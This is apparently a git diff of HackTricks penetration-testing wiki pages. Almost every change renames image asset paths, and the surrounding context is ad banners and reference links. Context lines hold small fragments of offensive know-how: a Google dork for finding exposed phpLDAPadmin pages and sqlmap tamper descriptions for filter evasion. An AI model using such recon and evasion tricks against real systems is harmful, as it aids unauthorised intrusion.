<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -315,7 +315,7 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne
|
||||||
* [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
|
* [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
|
||||||
* [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
|
* [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -183,7 +183,7 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a
|
||||||
* [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833)
|
* [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833)
|
||||||
* [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python)
|
* [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
|
|
@ -22,7 +22,7 @@ Browser extensions are written in JavaScript and loaded by the browser in the ba
|
||||||
|
|
||||||
Extension layouts look best when visualised and consists of three components. Let’s look at each component in depth.
|
Extension layouts look best when visualised and consists of three components. Let’s look at each component in depth.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (16).png" alt=""><figcaption><p><a href="http://webblaze.cs.berkeley.edu/papers/Extensions.pdf">http://webblaze.cs.berkeley.edu/papers/Extensions.pdf</a></p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (16) (1).png" alt=""><figcaption><p><a href="http://webblaze.cs.berkeley.edu/papers/Extensions.pdf">http://webblaze.cs.berkeley.edu/papers/Extensions.pdf</a></p></figcaption></figure>
|
||||||
|
|
||||||
### **Content Scripts**
|
### **Content Scripts**
|
||||||
|
|
||||||
|
|
|
@ -45,7 +45,7 @@ To exploit a CSRF vulnerability, several conditions must be met:
|
||||||
|
|
||||||
You could **capture the request in Burp** and check CSRF protections and to test from the bowser you can click on **Copy as fetch** and check the request:
|
You could **capture the request in Burp** and check CSRF protections and to test from the bowser you can click on **Copy as fetch** and check the request:
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (11) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### Defending Against CSRF
|
### Defending Against CSRF
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -340,7 +340,7 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie
|
||||||
* [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
|
* [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
|
||||||
* [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
|
* [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -279,7 +279,7 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are
|
||||||
|
|
||||||
{% embed url="https://github.com/ticarpi/jwt_tool" %}
|
{% embed url="https://github.com/ticarpi/jwt_tool" %}
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|
|
@ -111,11 +111,11 @@ It is important to note that cookies prefixed with `__Host-` are not allowed to
|
||||||
|
|
||||||
So, one of the protection of `__Host-` prefixed cookies is to prevent them from being overwritten from subdomains. Preventing for example [**Cookie Tossing attacks**](cookie-tossing.md). In the talk [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F\_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf)) it's presented that it was possible to set \_\_HOST- prefixed cookies from subdomain, by tricking the parser, for example, adding "=" at the beggining or at the beginig and the end...:
|
So, one of the protection of `__Host-` prefixed cookies is to prevent them from being overwritten from subdomains. Preventing for example [**Cookie Tossing attacks**](cookie-tossing.md). In the talk [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F\_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf)) it's presented that it was possible to set \_\_HOST- prefixed cookies from subdomain, by tricking the parser, for example, adding "=" at the beggining or at the beginig and the end...:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (6) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Or in PHP it was possible to add **other characters at the beginning** of the cookie name that were going to be **replaced by underscore** characters, allowing to overwrite `__HOST-` cookies:
|
Or in PHP it was possible to add **other characters at the beginning** of the cookie name that were going to be **replaced by underscore** characters, allowing to overwrite `__HOST-` cookies:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (7).png" alt="" width="373"><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (7) (1).png" alt="" width="373"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
## Cookies Attacks
|
## Cookies Attacks
|
||||||
|
|
||||||
|
|
|
@ -16,7 +16,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -235,7 +235,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php
|
||||||
|
|
||||||
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
|
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -106,7 +106,7 @@ SELECT $$hacktricks$$;
|
||||||
SELECT $TAG$hacktricks$TAG$;
|
SELECT $TAG$hacktricks$TAG$;
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -236,7 +236,7 @@ Remember that **you can create your own tamper in python** and it's very simple.
|
||||||
| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|
| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|
||||||
| xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' |
|
| xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' |
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
# XSS (Cross Site Scripting)
|
# XSS (Cross Site Scripting)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -1544,7 +1544,7 @@ Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](ht
|
||||||
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
|
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
|
||||||
* [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
|
* [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|